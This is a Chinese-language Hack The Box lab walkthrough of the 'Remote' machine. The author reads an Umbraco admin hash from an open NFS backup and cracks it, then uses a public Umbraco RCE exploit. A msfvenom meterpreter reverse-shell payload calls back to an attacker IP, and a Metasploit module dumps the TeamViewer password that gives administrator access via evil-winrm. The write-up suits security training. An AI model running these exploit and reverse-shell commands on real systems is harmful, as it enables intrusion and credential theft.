HTB-[remote]

0x00.简述

0x01.信息收集

主要信息21/80端口，nfs服务与mountd

NFS（Network File System）即网络文件系统，是FreeBSD支持的文件系统中的一种，它允许网络中的计算机之间共享资源。在NFS的应用中，本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件，就像访问本地文件一样。

root@JIYE:~/htb/remote# nmap -sC -sV 10.10.10.180 -oN nmap.CV
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-31 06:09 EDT
Nmap scan report for 10.10.10.180
Host is up (0.38s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m52s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-31T10:12:50
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.17 seconds
root@JIYE:~/htb/remote#

0x02.访问ftp

没有什么有用的信息

0x03.访问80端口

手动爬虫，发现umbraco登入框

umbraco为付费cms

0x04.查看挂载信息

查看挂载目录，发现网站备份文件，权限为everyone

root@JIYE:~/htb/remote# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
root@JIYE:~/htb/remote#

挂载到本地，进行查看

root@JIYE:~/htb/remote# mkdir site_backups
root@JIYE:~/htb/remote# mount 10.10.10.180:site_backups site_backups/
root@JIYE:~/htb/remote# cd site_backups/
root@JIYE:~/htb/remote/site_backups# ls
App_Browsers  App_Plugins    bin     css           Global.asax  scripts  Umbraco_Client  Web.config
App_Data      aspnet_client  Config  default.aspx  Media        Umbraco  Views
root@JIYE:~/htb/remote/site_backups#

查看Umbraco.sdf数据库中admin字符

root@JIYE:~/htb/remote/site_backups# cd App_Data/
root@JIYE:~/htb/remote/site_backups/App_Data# ls
cache  Logs  Models  packages  TEMP  umbraco.config  Umbraco.sdf  
root@JIYE:~/htb/remote/site_backups/App_Data# strings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating Key, IsApproved, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <smith@htb.local>umbraco/user/saveupdating Name, Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/saveupdating Username, Email, Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <admin@htb.local>192.168.195.1umbraco/user/sign-in/failedlogin failed
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
adminAdministratorsCADMOSKTPIURZ:5F7
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating TourData, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
root@JIYE:~/htb/remote/site_backups/App_Data#

其中重要信息为admin用户为admin@htb.local，并且hash值为如下

1 2	admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"} User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success

解码散列hash值URL

保存用户与密码

root@JIYE:~/htb/remote# cat user.txt 
user:admin@htb.local
hash:b8be16afba8c314ad33d812f22a04991b90e2aaa
crack:baconandcheese
root@JIYE:~/htb/remote#

0x05.查找umbraco exploit

exp URL

0x06.利用

root@JIYE:~/htb/remote# git clone https://github.com/noraj/Umbraco-RCE.git
root@JIYE:~/htb/remote# ls
nmap.CV  site_backups  Umbraco-RCE  user.txt
root@JIYE:~/htb/remote# cd Umbraco-RCE/
root@JIYE:~/htb/remote/Umbraco-RCE# ls
exploit.py  LICENSE  README.md  requirements.txt
root@JIYE:~/htb/remote/Umbraco-RCE#

查看参数

Usage
$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       username / email
  -p PASS, --password PASS   password
  -i URL, --host URL         root URL
  -c CMD, --command CMD      command
  -a ARGS, --arguments ARGS  arguments
Examples:

$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Com

exp

root@JIYE:~/htb/remote/Umbraco-RCE# python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'ls C:/'


    Directory: C:\

Mode                LastWriteTime         Length Name                               
----                -------------         ------ ----                               
d-----        2/20/2020   1:13 AM                ftp_transfer 
d-----        2/19/2020   3:11 PM                inetpub                             
d-----        2/19/2020  11:09 PM                Microsoft                           
d-----        9/15/2018   3:19 AM                PerfLogs                           
d-r---        2/23/2020   2:19 PM                Program Files                       
d-----        2/23/2020   2:19 PM                Program Files (x86)                 
d-----        8/31/2020   4:27 AM                site_backups
d-r---        2/19/2020   3:12 PM                Users                              
d-----        2/20/2020  12:52 AM                Windows                             

root@JIYE:~/htb/remote/Umbraco-RCE#

查看网站根目录，关注Media，后面有用

root@JIYE:~/htb/remote/Umbraco-RCE# python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'ls C:/inetpub'


    Directory: C:\inetpub

Mode                LastWriteTime         Length Name
----                -------------         ------ ----                               
d-----        2/19/2020   3:11 PM                custerr
d-----        2/19/2020   3:11 PM                ftproot
d-----        2/20/2020   1:33 AM                history                            
d-----        2/19/2020   4:36 PM                logs
d-----        2/19/2020   3:11 PM                temp
d-----        2/20/2020  12:16 PM                wwwroot                                                               

root@JIYE:~/htb/remote/Umbraco-RCE# python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'ls C:/inetpub/wwwroot'


    Directory: C:\inetpub\wwwroot

Mode                LastWriteTime         Length Name                               
----                -------------         ------ ----                               
d-----        2/19/2020   6:02 PM                App_Browsers
d-----        2/20/2020   1:59 AM                App_Data                           
d-----        2/19/2020  10:29 PM                App_Plugins                         
d-----        2/19/2020   3:12 PM                aspnet_client                       
d-----        2/19/2020  11:30 PM                bin                                 
d-----        2/19/2020   6:02 PM                Config                             
d-----        2/19/2020  10:29 PM                css                                 
d-----        8/31/2020   7:57 AM                Media                               
d-----        2/19/2020  10:29 PM                scripts                             
d-----        2/19/2020   6:02 PM                Umbraco                             
d-----        2/19/2020   6:02 PM                Umbraco_Client                     
d-----        2/19/2020  10:29 PM                Views
-a----        11/1/2018   1:06 PM            152 default.aspx                       
-a----        11/1/2018   1:06 PM             89 Global.asax                         
-a----        2/20/2020  12:57 AM          28539 Web.config                                                            
root@JIYE:~/htb/remote/Umbraco-RCE#

0x07.登入web application

发现Media模块可以上传文件，同时还发了某位"前辈"上传的exe执行程序😂

msf生成exe上传

root@JIYE:~/htb/remote# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.17.216 LPORT=6666 -f exe -o demo.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: demo.exe
root@JIYE:~/htb/remote# ls
demo.exe  nmap.CV  site_backups  Umbraco-RCE  user.txt
root@JIYE:~/htb/remote#

上传demo.exe，然而在这里是没有上传到Media目录下的

再次上传

输入一个名字，并点击保存

这里上传成功

命令行下再次查看，结果是存在的，上传成功

root@JIYE:~/htb/remote/Umbraco-RCE# python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'ls C:/inetpub/wwwroot/Media/1033'


    Directory: C:\inetpub\wwwroot\Media\1036


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        8/31/2020   8:57 AM          73802 demo.exe                                                              

root@JIYE:~/htb/remote/Umbraco-RCE#

0x08.反弹shell

msf监听

msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.17.216
lhost => 10.10.17.216
msf5 exploit(multi/handler) > set lport 6666
lport => 6666
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.17.216:6666

执行demo.exe

1 2	root@JIYE:~/htb/remote/Umbraco-RCE# python3 exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a 'C:/inetpub/wwwroot/Media/1033/demo.exe'

得到shell

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.17.216:6666 
[*] Sending stage (176195 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.17.216:6666 -> 10.10.10.180:49688) at 2020-08-31 10:41:25 -0400

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter >

寻找user.txt

meterpreter > shell
Process 3180 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

C:\windows\system32\inetsrv>cd\
cd\

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\

02/20/2020  02:13 AM    <DIR>          ftp_transfer
02/19/2020  04:11 PM    <DIR>          inetpub
02/20/2020  12:09 AM    <DIR>          Microsoft
09/15/2018  03:19 AM    <DIR>          PerfLogs
02/23/2020  03:19 PM    <DIR>          Program Files
02/23/2020  03:19 PM    <DIR>          Program Files (x86)
08/31/2020  09:32 AM    <DIR>          site_backups
02/19/2020  04:12 PM    <DIR>          Users
02/20/2020  01:52 AM    <DIR>          Windows
               0 File(s)              0 bytes
               9 Dir(s)  19,406,811,136 bytes free

C:\>cd Users    
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Users

02/19/2020  04:12 PM    <DIR>          .
02/19/2020  04:12 PM    <DIR>          ..
02/19/2020  04:12 PM    <DIR>          .NET v2.0
02/19/2020  04:12 PM    <DIR>          .NET v2.0 Classic
02/19/2020  04:12 PM    <DIR>          .NET v4.5
02/19/2020  04:12 PM    <DIR>          .NET v4.5 Classic
08/31/2020  10:33 AM    <DIR>          Administrator
02/19/2020  04:12 PM    <DIR>          Classic .NET AppPool
02/20/2020  03:42 AM    <DIR>          Public
               0 File(s)              0 bytes
               9 Dir(s)  19,406,811,136 bytes free

C:\Users>cd Public
cd Public

C:\Users\Public>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Users\Public

02/20/2020  03:42 AM    <DIR>          .
02/20/2020  03:42 AM    <DIR>          ..
02/19/2020  04:03 PM    <DIR>          Documents
09/15/2018  03:19 AM    <DIR>          Downloads
09/15/2018  03:19 AM    <DIR>          Music
09/15/2018  03:19 AM    <DIR>          Pictures
08/31/2020  10:33 AM                34 user.txt
09/15/2018  03:19 AM    <DIR>          Videos
               1 File(s)             34 bytes
               7 Dir(s)  19,406,798,848 bytes free

C:\Users\Public>type user.txt
type user.txt
****************************

C:\Users\Public>

0x09.提权

查看软件目录，发现安装了teamviewer

C:\>cd program files
cd program files

C:\Program Files>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Program Files

02/23/2020  03:19 PM    <DIR>          .
02/23/2020  03:19 PM    <DIR>          ..
02/19/2020  04:04 PM    <DIR>          Common Files
09/15/2018  05:06 AM    <DIR>          internet explorer
02/23/2020  03:16 PM    <DIR>          Microsoft SQL Server
02/19/2020  04:11 PM    <DIR>          MSBuild
02/19/2020  04:11 PM    <DIR>          Reference Assemblies
02/19/2020  04:04 PM    <DIR>          VMware
02/20/2020  07:46 AM    <DIR>          Windows Defender
09/15/2018  05:05 AM    <DIR>          Windows Defender Advanced Threat Protection
09/15/2018  03:19 AM    <DIR>          Windows Mail
10/29/2018  06:39 PM    <DIR>          Windows Media Player
09/15/2018  03:19 AM    <DIR>          Windows Multimedia Platform
09/15/2018  03:28 AM    <DIR>          windows nt
10/29/2018  06:39 PM    <DIR>          Windows Photo Viewer
09/15/2018  03:19 AM    <DIR>          Windows Portable Devices
09/15/2018  03:19 AM    <DIR>          Windows Security
09/15/2018  03:19 AM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              18 Dir(s)  19,407,548,416 bytes free


C:\>cd program files (x86)
cd program files (x86)

C:\Program Files (x86)>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Program Files (x86)

02/23/2020  03:19 PM    <DIR>          .
02/23/2020  03:19 PM    <DIR>          ..
09/15/2018  03:28 AM    <DIR>          Common Files
09/15/2018  05:06 AM    <DIR>          Internet Explorer
02/23/2020  03:19 PM    <DIR>          Microsoft SQL Server
02/23/2020  03:15 PM    <DIR>          Microsoft.NET
02/19/2020  04:11 PM    <DIR>          MSBuild
02/19/2020  04:11 PM    <DIR>          Reference Assemblies
02/20/2020  03:14 AM    <DIR>          TeamViewer
09/15/2018  05:05 AM    <DIR>          Windows Defender
09/15/2018  03:19 AM    <DIR>          Windows Mail
10/29/2018  06:39 PM    <DIR>          Windows Media Player
09/15/2018  03:19 AM    <DIR>          Windows Multimedia Platform
09/15/2018  03:28 AM    <DIR>          windows nt
10/29/2018  06:39 PM    <DIR>          Windows Photo Viewer
09/15/2018  03:19 AM    <DIR>          Windows Portable Devices
09/15/2018  03:19 AM    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              17 Dir(s)  19,407,241,216 bytes free

C:\Program Files (x86)>

查看teamviewer版本，结果为v7

C:\Program Files (x86)>cd teamviewer
cd teamviewer

C:\Program Files (x86)\TeamViewer>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of C:\Program Files (x86)\TeamViewer

02/20/2020  03:14 AM    <DIR>          .
02/20/2020  03:14 AM    <DIR>          ..
02/27/2020  11:35 AM    <DIR>          Version7
               0 File(s)              0 bytes
               3 Dir(s)  19,405,176,832 bytes free

C:\Program Files (x86)\TeamViewer>

msf破解teamviewer密码，密码为!R3m0te!

meterpreter > run post/windows/gather/credentials/teamviewer_passwords

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
[+] Passwords stored in: /root/.msf4/loot/20200831110133_default_10.10.10.180_host.teamviewer__720435.txt
[*] <---------------- | Using Window Technique | ---------------->
[*] TeamViewer's language setting options are ''
[*] TeamViewer's version is ''
[-] Unable to find TeamViewer's process
meterpreter >

使用evil-winrm提权exp地址

root@JIYE:~/htb/remote# proxychains gem install winrm winrm-fs stringio
root@JIYE:~/htb/remote# git clone https://github.com/Hackplayers/evil-winrm.git
正克隆到 'evil-winrm'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 805 (delta 9), reused 17 (delta 6), pack-reused 783
接收对象中: 100% (805/805), 1.96 MiB | 1.35 MiB/s, 完成.
处理 delta 中: 100% (461/461), 完成.
root@JIYE:~/htb/remote# ls
demo.exe  evil-winrm  flag  nmap.CV  site_backups  Umbraco-RCE  user.txt
root@JIYE:~/htb/remote#

查看相关参数

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM]
    -S, --ssl                        Enable ssl
    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate
    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate
    -r, --realm DOMAIN               Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts local path
    -e, --executables EXES_PATH      C# executables local path
    -i, --ip IP                      Remote host IP or hostname (required)
    -U, --url URL                    Remote url endpoint (default wsman)
    -u, --user USER                  Username (required if not using kerberos)
    -p, --password PASS              Password
    -H, --hash NTHash                NTHash 
    -P, --port PORT                  Remote host port (default 5985)
    -V, --version                    Show version
    -n, --no-colors                  Disable colors
    -h, --help                       Display this help message

提权

root@JIYE:~/htb/remote/evil-winrm# ruby evil-winrm.rb -u 'administrator' -p '!R3m0te!' -i '10.10.10.180'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd\
*Evil-WinRM* PS C:\> whoami
remote\administrator

查找root.txt

*Evil-WinRM* PS C:\users\administrator> cd desktop
*Evil-WinRM* PS C:\users\administrator\desktop> dir


    Directory: C:\users\administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/31/2020  10:33 AM             34 root.txt


*Evil-WinRM* PS C:\users\administrator\desktop> type root.txt
*********************************************
*Evil-WinRM* PS C:\users\administrator\desktop>